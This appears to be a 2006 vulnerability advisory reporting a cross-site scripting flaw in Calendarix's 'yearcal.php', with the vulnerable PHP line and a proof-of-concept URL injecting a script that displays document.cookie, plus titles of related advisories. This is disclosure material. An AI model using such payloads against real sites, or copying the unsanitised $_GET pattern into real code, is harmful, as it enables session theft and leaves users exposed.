Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) - PHPGraphy <= 0.9.11 "editwelcome" unauthorized access / cross site scripting - PhpWebFTP 3.2 Login Script MyEvent Remote File Execution And XSS Attacking FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass] From:botan_(at)_linuxmail.org <botan_(at)_linuxmail.org> Date:17.04.2006Subject:Calendarix "yearcal.php" XSS AttackingWebsite : http://www.calendarix.com Vulnerable : if (!isset($_GET['ycyear'])) $ycyear = $y ; else $ycyear = $_GET['ycyear']; http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
- PHPGraphy <= 0.9.11 "editwelcome" unauthorized access / cross site scripting -
PhpWebFTP 3.2 Login Script
MyEvent Remote File Execution And XSS Attacking
FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]
